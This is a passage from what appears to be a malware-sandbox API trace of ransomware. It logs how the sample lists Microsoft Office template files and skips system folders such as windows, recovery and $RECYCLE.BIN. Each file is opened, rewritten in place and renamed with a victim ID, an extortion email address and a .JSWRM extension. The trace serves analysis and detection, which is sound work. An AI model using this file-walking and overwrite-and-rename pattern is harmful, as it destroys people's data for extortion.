office\\root\\office16\\1033\\quickstyles\\basicelegant.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicelegant.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicelegant.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0120.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0120.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0120.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.931] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2fe8, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="basicsimple.dotx", cAlternateFileName="BASICS~2.DOT")) returned 1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2=".") returned 1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="..") returned 1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="...") returned 1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="windows") returned -1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="recovery") returned -1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="perflogs") returned -1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="documents and settings") returned -1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="system volume information") returned -1 [0120.931] lstrcmpiW (lpString1="basicsimple.dotx", lpString2="msocache") returned -1 [0120.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicsimple.dotx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicsimple.dotx", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="basicsimple.dotx", lpUsedDefaultChar=0x0) returned 16 [0120.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicsimple.dotx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicsimple.dotx", cchWideChar=16, lpMultiByteStr=0x241178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="basicsimple.dotx", lpUsedDefaultChar=0x0) returned 16 [0120.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0120.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0120.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0120.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicsimple.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicsimple.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.932] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12264) returned 1 [0120.932] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fe0) returned 0x24e1d8 [0120.932] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2fe0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2fe0, lpOverlapped=0x0) returned 1 [0120.934] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.934] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2fe0, lpOverlapped=0x0) returned 1 [0120.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.934] CloseHandle (hObject=0x314) returned 1 [0120.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0120.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0120.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0120.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0120.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0120.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0120.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.935] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicsimple.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicsimple.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicsimple.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicsimple.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.936] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f15, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="basicstylish.dotx", cAlternateFileName="BASICS~1.DOT")) returned 1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2=".") returned 1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="..") returned 1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="...") returned 1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="windows") returned -1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="recovery") returned -1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="perflogs") returned -1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="documents and settings") returned -1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="system volume information") returned -1 [0120.936] lstrcmpiW (lpString1="basicstylish.dotx", lpString2="msocache") returned -1 [0120.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicstylish.dotx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0120.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicstylish.dotx", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="basicstylish.dotx", lpUsedDefaultChar=0x0) returned 17 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicstylish.dotx", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0120.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="basicstylish.dotx", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="basicstylish.dotx", lpUsedDefaultChar=0x0) returned 17 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0120.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0120.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0120.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicstylish.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicstylish.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.938] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12053) returned 1 [0120.938] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f10) returned 0x24e1d8 [0120.938] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f10, lpOverlapped=0x0) returned 1 [0120.940] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.940] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f10, lpOverlapped=0x0) returned 1 [0120.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.940] CloseHandle (hObject=0x314) returned 1 [0120.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0120.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0120.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0120.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0120.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0120.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0120.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.941] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicstylish.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicstylish.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\basicstylish.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\basicstylish.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0120.942] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f1d, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="bwcapitalized.dotx", cAlternateFileName="BWCAPI~1.DOT")) returned 1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2=".") returned 1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="..") returned 1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="...") returned 1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="windows") returned -1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="recovery") returned -1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="perflogs") returned -1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="documents and settings") returned -1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="system volume information") returned -1 [0120.942] lstrcmpiW (lpString1="bwcapitalized.dotx", lpString2="msocache") returned -1 [0120.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwcapitalized.dotx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0120.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0120.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwcapitalized.dotx", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bwcapitalized.dotx", lpUsedDefaultChar=0x0) returned 18 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwcapitalized.dotx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0120.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0120.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bwcapitalized.dotx", cchWideChar=18, lpMultiByteStr=0x240f70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bwcapitalized.dotx", lpUsedDefaultChar=0x0) returned 18 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0120.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0120.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0120.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwcapitalized.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwcapitalized.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.943] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12061) returned 1 [0120.943] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f10) returned 0x24e1d8 [0120.943] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f10, lpOverlapped=0x0) returned 1 [0120.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.946] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f10, lpOverlapped=0x0) returned 1 [0120.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.946] CloseHandle (hObject=0x314) returned 1 [0120.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0120.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0120.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0120.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0120.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0120.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0120.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.946] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwcapitalized.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwcapitalized.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\bwcapitalized.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\bwcapitalized.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0120.947] HeapFree (in: hHeap=0x1e0000, 